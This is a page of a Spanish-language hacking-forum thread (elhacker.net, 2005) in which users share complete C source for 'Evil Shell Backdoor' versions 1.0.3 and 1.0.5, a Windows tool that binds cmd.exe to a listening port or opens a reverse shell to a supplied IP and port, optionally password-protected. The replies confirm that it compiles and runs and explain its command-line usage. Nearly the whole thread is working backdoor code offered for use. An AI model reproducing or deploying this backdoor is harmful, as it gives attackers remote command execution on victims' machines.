elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Win Backdoor Bind port
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: Win Backdoor Bind port  (Leído 14,922 veces)
sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #20 en: 18 Agosto 2005, 23:28 pm »

Gracias Gangrel. Espero que esto te guste y os siga funcionando porque aún no lo he compilado con Dev C++  ::)
Mejorando:

Código:
/*
====================================================================================
||  ##           #######  ##   ##    ##     #######   #######       ##    ##  ##  ||
||  ##           ##    ##  ## ##  ########  ##        ##         ######## ## ##   ||
||  ##     ##### ########   ###      ##     #######   #######       ##    ####    ||
||  ##           ##    ##   ##       ##     ##             ##  ###  ##    ## ##   ||
||  ######       #######    ##       ##     #######   #######  ###  ##    ##  ##  ||
====================================================================================

Nombre: Evil Shell Backdoor
Version: 1.0.3
Fichero: Evil.Shell.Backdoor_1.0.3.c
Descripcion: Devuelve Bind Shell por el puerto que se le indique, o reverse shell al
Ip:Puerto que se le indique
Autor: Lympex
Contacto:
+ Web: http://l-bytes.tk
+ Mail: lympex[at]gmail[dot]com
Fecha: 17/08/2005

Greetz:
-------
orphen_nb
HaCkZaTaN
P[i]

Nota: Posible fallo al dar shell en Windows XP Professional SP2
*/

#include <stdio.h>
#include <winsock2.h>
//la librería del socket
#pragma comment(lib,"ws2_32")

//devuelde la descripción del error, a partir de su código
char *MensajeError(DWORD error_num);

/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
SOCKET Sock;//el que establece la conexion
struct sockaddr_in Winsock_In;
/*para crear el proceso de la shell*/
STARTUPINFO start_proc; /*datos del proceso en el que volcar los datos/eventos*/
PROCESS_INFORMATION info_proc; /*salida del proceso de la shell*/

int main(int argc, char *argv[])
{
/*BINDEA UNA SHELL AL PUERTO INDICADO*/
int BindShellPort(short port);
/*CONECTA A UNA IP POR UN PUERTO, PARA DAR SHELL*/
int ReverseShell(char *Ip, short port);
/*FUNCIÓN QUE INDICA LA IP A PARTIR DEL HOST*/
char *HostIp(char *Host);

printf("\n#####################################################");
printf("\n#    -[ Evil Shell Backdoor 1.0.3 - by Lympex ]-    #");
printf("\n#---------------------------------------------------#");
printf("\n#            Windows Evil Shell Backdoor            #");
printf("\n#---------------------------------------------------#");
printf("\n# Contacto:                                         #");
printf("\n#   + HomePage: http://l-bytes.tk                   #");
printf("\n#   + Mail: lympex[at]gmail[dot]com                 #");
printf("\n#####################################################\n");

//comprobamos los argumentos
if(argc<2 || argc>3)
{
printf("\n[+] Usos:");
printf("\n    + Bind Shell: %s 5968",argv[0]);
printf("\n    + Rev. Shell: %s localhost 5968\n",argv[0]);
ExitProcess(0);
}

//miramos qué tipo de shell quiere
if(argc==2)
{
//lanzamos la bind shell
BindShellPort((short)atoi(argv[1]));
}else{
//lanzamos la rev. shell
ReverseShell(HostIp(argv[1]),(short)atoi(argv[2]));
}

ExitProcess(0);
}

/*BINDEA UNA SHELL AL PUERTO INDICADO*/
int BindShellPort(short port)
{
/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*si usamos socket en lugar de WSASocket, no funciona :/ */
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=htonl(INADDR_ANY);
/*unimos el socket*/
if(bind(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In))==SOCKET_ERROR)
{
//printf("ERROR - Error al bindear el socket\n");
printf("ERROR - %s",MensajeError(GetLastError()));
WSACleanup();
return 1;
}
/*lo ponemos a la escucha, a la espera de clientes*/
if(listen(Winsock,5)==SOCKET_ERROR)
{
//printf("ERROR - Error al poner el socket a la escucha\n");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}
printf("\n[+] Esperando conexion por el puerto %d...",port);
/*asociamos la conexión establecida a otro socket*/
if((Sock=accept(Winsock,NULL,NULL))==INVALID_SOCKET)
{
//printf("ERROR - Error al aceptar\n");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)Sock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK\n");
}

return 0;
}

/*CONECTA A UNA IP POR UN PUERTO, PARA DAR SHELL*/
int ReverseShell(char *Ip, short port)
{
/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*si usamos socket en lugar de WSASocket, no funciona :/ */
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(Ip);

if(Winsock==INVALID_SOCKET)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

printf("\n[+] Conectando con %s:%d...",Ip,port);
/*conectamos*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)Winsock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK\n");
}

return 0;
}

/*FUNCIÓN QUE INDICA LA IP A PARTIR DEL HOST*/
char *HostIp(char *Host)
{
   WSADATA wsaData;
   struct hostent *Dire;

   /*creamos el socket y cogemos el hostname*/
   if(WSAStartup(MAKEWORD(1, 1), &wsaData)!=0 || (Dire=gethostbyname(Host))==NULL)
   {
   return NULL;
   }

   /*devolvemos la ip*/
   return inet_ntoa(*((struct in_addr *)Dire->h_addr));
}

//devuelde la descripción del error, a partir de su código
char *MensajeError(DWORD error_num)
{
char *lpMsgBuf;

//cojemos el mensaje del error
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
error_num,
0,
(LPTSTR) &lpMsgBuf,
0,
NULL
);

return lpMsgBuf;
}


« Última modificación: 18 Agosto 2005, 23:30 pm por Lympex » En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
kichan


Desconectado Desconectado

Mensajes: 372


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #21 en: 18 Agosto 2005, 23:33 pm »

limpex dme una cosa tu programa funciona de la linea de comandos tamos de acuerdo.. pero como debo pasarle los parametros para que se ejcute correctamente ..es decir

yo lo hice algo asi

c:\tuprograma 5968 
asi debo ejecutarlo????

lo compile con DEV C++ y rula perfecto..
ahora .que bueno que le hayas ehco mejoras..te felicito...


En línea

sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #22 en: 18 Agosto 2005, 23:36 pm »

si, el ejemplo que dices sería para la bind shell.

Citar
#####################################################
#    -[ Evil Shell Backdoor 1.0.3 - by Lympex ]-    #
#---------------------------------------------------#
#            Windows Evil Shell Backdoor            #
#---------------------------------------------------#
# Contacto:                                         #
#   + HomePage: http://l-bytes.tk                   #
#   + Mail: lympex[at]gmail[dot]com                 #
#####################################################

  • Usos:
    + Bind Shell: Evil.Shell.Backdoor_1.0.3.exe 5968
    + Rev. Shell: Evil.Shell.Backdoor_1.0.3.exe localhost 5968
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
kichan


Desconectado Desconectado

Mensajes: 372


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #23 en: 18 Agosto 2005, 23:39 pm »

y para Rev. shell   ??
En línea

sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #24 en: 18 Agosto 2005, 23:42 pm »

no has leido mi último post, ni has compilado el nuevo codigo?   :-X
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
kichan


Desconectado Desconectado

Mensajes: 372


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #25 en: 18 Agosto 2005, 23:44 pm »

ups.. claro....pero nada te hubiera costado que me hubieras respondido iguall  ;D
En línea

sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #26 en: 19 Agosto 2005, 00:11 am »

Aquí está la version 1.0.5  ;)

Código:
/*
====================================================================================
||  ##           #######  ##   ##    ##     #######   #######       ##    ##  ##  ||
||  ##           ##    ##  ## ##  ########  ##        ##         ######## ## ##   ||
||  ##     ##### ########   ###      ##     #######   #######       ##    ####    ||
||  ##           ##    ##   ##       ##     ##             ##  ###  ##    ## ##   ||
||  ######       #######    ##       ##     #######   #######  ###  ##    ##  ##  ||
====================================================================================

Nombre: Evil Shell Backdoor
Version: 1.0.5
Fichero: Evil.Shell.Backdoor_1.0.5.c
Descripcion: Devuelve Bind Shell por el puerto que se le indique, o reverse shell al
Ip:Puerto que se le indique, con posibilidad de poner pass
Autor: Lympex
Contacto:
+ Web: http://l-bytes.tk
+ Mail: lympex[at]gmail[dot]com
Fecha: 17/08/2005

Greetz:
-------
orphen_nb
HaCkZaTaN
P[i]

Nota: Posible fallo al dar shell en Windows XP Professional SP2
*/

#include <stdio.h>
#include <winsock2.h>

//la librería del socket
#pragma comment(lib,"ws2_32")

/*devuelde la descripción del error, a partir de su código*/
char *MensajeError(DWORD error_num);

/*
FUNCIÓN CHOP($str); (TRADUCIDO DE LENGUAJE PERL) - by Lympex
quita el último caracter de una string
*/
char chop(char *variable);

/*para crear el socket*/
WSADATA wsaData;
SOCKET Winsock;//el que escucha
SOCKET Sock;//el que establece la conexion
struct sockaddr_in Winsock_In;
/*para crear el proceso de la shell*/
STARTUPINFO start_proc; /*datos del proceso en el que volcar los datos/eventos*/
PROCESS_INFORMATION info_proc; /*salida del proceso de la shell*/

/*para comprobar la password en caso de que exista*/
char passwd[100];
unsigned int i;

int main(int argc, char *argv[])
{
/*BINDEA UNA SHELL AL PUERTO INDICADO*/
int BindShellPort(short port, char *pwd);
/*CONECTA A UNA IP POR UN PUERTO, PARA DAR SHELL*/
int ReverseShell(char *Ip, short port, char *pwd);
/*FUNCIÓN QUE INDICA LA IP A PARTIR DEL HOST*/
char *HostIp(char *Host);

printf("\n#####################################################");
printf("\n#    -[ Evil Shell Backdoor 1.0.5 - by Lympex ]-    #");
printf("\n#---------------------------------------------------#");
printf("\n#            Windows Evil Shell Backdoor            #");
printf("\n#---------------------------------------------------#");
printf("\n# Contacto:                                         #");
printf("\n#   + HomePage: http://l-bytes.tk                   #");
printf("\n#   + Mail: lympex[at]gmail[dot]com                 #");
printf("\n#####################################################\n");

//comprobamos los argumentos
if(argc<3 || argc>6)
{
printf("\n[+] Usos:");
printf("\n    + Bind Shell: %s -b 5968 <opcion>",argv[0]);
printf("\n    + Rev. Shell: %s -r localhost 5968 <opcion>\n",argv[0]);
printf("\n[+] Opcion:");
printf("\n    + -p <pwd>\n");
ExitProcess(0);
}

//si es bind
if(!strcmp(argv[1],"-b"))
{
if(argc>=5)
{
BindShellPort((short)atoi(argv[2]),argv[4]);
}else{
BindShellPort((short)atoi(argv[2]),NULL);
}
}else if(!strcmp(argv[1],"-r")){

if(argc>=6)
{
ReverseShell(HostIp(argv[2]),(short)atoi(argv[3]),argv[5]);
}else{
ReverseShell(HostIp(argv[2]),(short)atoi(argv[3]),NULL);
}
}else{
printf("\n[!] Parametro incorrecto\n");
}

ExitProcess(0);
}

/*BINDEA UNA SHELL AL PUERTO INDICADO*/
int BindShellPort(short port, char *pwd)
{
/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*si usamos socket en lugar de WSASocket, no funciona :/ */
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=htonl(INADDR_ANY);
/*unimos el socket*/
if(bind(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In))==SOCKET_ERROR)
{
//printf("ERROR - Error al bindear el socket\n");
printf("ERROR - %s",MensajeError(GetLastError()));
WSACleanup();
return 1;
}
/*lo ponemos a la escucha, a la espera de clientes*/
if(listen(Winsock,5)==SOCKET_ERROR)
{
//printf("ERROR - Error al poner el socket a la escucha\n");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}
printf("\n[+] Esperando conexion por el puerto %d...",port);
/*asociamos la conexión establecida a otro socket*/
if((Sock=accept(Winsock,NULL,NULL))==INVALID_SOCKET)
{
//printf("ERROR - Error al aceptar\n");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

if(pwd!=NULL)
{
printf("\n[+] Esperando password...");
do
{
send(Sock,"[+] Introduce la password de la shell: ",strlen("[+] Introduce la password de la shell: "),0);
i=recv(Sock,passwd,100,0);chop(passwd);
passwd[i]='\0';
}while(strcmp(pwd,passwd));//mientras que lo que recibamos no es igual a la contraseña
printf("OK");
send(Sock,"\n",strlen("\n"),0);
}

printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)Sock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK\n");
}

return 0;
}

/*CONECTA A UNA IP POR UN PUERTO, PARA DAR SHELL*/
int ReverseShell(char *Ip, short port, char *pwd)
{
/*=========================================
COMENZAMOS A PONER EL SOCKET A LA ESCUCHA
=========================================*/
printf("\n[+] Creando el Socket...");
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
//Winsock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);/*si usamos socket en lugar de WSASocket, no funciona :/ */
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(port);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(Ip);

if(Winsock==INVALID_SOCKET)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

printf("\n[+] Conectando con %s:%d...",Ip,port);
/*conectamos*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK");
}

if(pwd!=NULL)
{
printf("\n[+] Esperando password...");
do
{
send(Winsock,"[+] Introduce la password para la shell: ",strlen("\n[+] Introduce la password para la shell: "),0);
i=recv(Winsock,passwd,100,0);chop(passwd);
passwd[i]='\0';
}while(strcmp(pwd,passwd));
printf("OK");
send(Winsock,"\n",strlen("\n"),0);
}

printf("\n[+] Lanzando shell...");

/*=========================================
             LANZAMOS LA SHELL
=========================================*/
//rellenamos la estructura
memset(&start_proc,0,sizeof(start_proc));//limpiamos
start_proc.cb=sizeof(start_proc);
start_proc.dwFlags=STARTF_USESTDHANDLES;
start_proc.hStdInput = start_proc.hStdOutput = start_proc.hStdError = (HANDLE)Winsock;
//lanzamos la shell
if(CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&start_proc,&info_proc)==0)
{
//printf("ERROR");
printf("ERROR - %s",MensajeError(GetLastError()));
/*salimos*/
printf("\n[+] Cerrando socket...");
WSACleanup();
printf("OK\n");
return 1;
}else{
printf("OK\n");
}

return 0;
}

/*FUNCIÓN QUE INDICA LA IP A PARTIR DEL HOST*/
char *HostIp(char *Host)
{
   WSADATA wsaData;
   struct hostent *Dire;

   /*creamos el socket y cogemos el hostname*/
   if(WSAStartup(MAKEWORD(1, 1), &wsaData)!=0 || (Dire=gethostbyname(Host))==NULL)
   {
   return NULL;
   }

   /*devolvemos la ip*/
   return inet_ntoa(*((struct in_addr *)Dire->h_addr));
}

//devuelde la descripción del error, a partir de su código
char *MensajeError(DWORD error_num)
{
char *lpMsgBuf;

//cojemos el mensaje del error
FormatMessage(
FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_FROM_SYSTEM |
FORMAT_MESSAGE_IGNORE_INSERTS,
NULL,
error_num,
0,
(LPTSTR) &lpMsgBuf,
0,
NULL
);

return lpMsgBuf;
}

//FUNCIÓN CHOP($str); (TRADUCIDO DE LENGUAJE PERL) - by Lympex
//quita el último caracter de una string
char chop(char *variable)
{
char *tmp;
unsigned int i;

tmp=(char *) malloc(strlen(variable)*sizeof(char));
strcpy(tmp,variable);

for(i=0;i<strlen(tmp)-1;i++)
{
variable[i]=tmp[i];
variable[i+1]='\0';
}

return tmp[strlen(tmp)];
}
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
kichan


Desconectado Desconectado

Mensajes: 372


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #27 en: 19 Agosto 2005, 00:12 am »

hasta cuando sigues posteado tu code.. digo. pra saber a que atenernos.. :P
En línea

sch3m4
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.608

Nihil est in intelectu quod prius not fuerit insen


Ver Perfil WWW
Re: Win Backdoor Bind port
« Respuesta #28 en: 19 Agosto 2005, 00:15 am »

solo estoy posteando algunas mejoras en el source por si a alguien le interesa.
En línea

SafetyBits

"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.(..
kichan


Desconectado Desconectado

Mensajes: 372


Ver Perfil
Re: Win Backdoor Bind port
« Respuesta #29 en: 19 Agosto 2005, 00:17 am »

ah por supuesto.... ;D
En línea

Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Bind and Reverse Backdoor Shell con Netcat
Redes
Socket_0x01 0 4,000 Último mensaje 25 Febrero 2011, 05:07 am
por Socket_0x01
port y host
Foro Libre
Panic0 1 1,518 Último mensaje 18 Agosto 2020, 23:01 pm
por EdePC
Resoluciones con Servidor DNS Bind
Redes
ernestoffdez 1 1,915 Último mensaje 19 Febrero 2021, 23:08 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines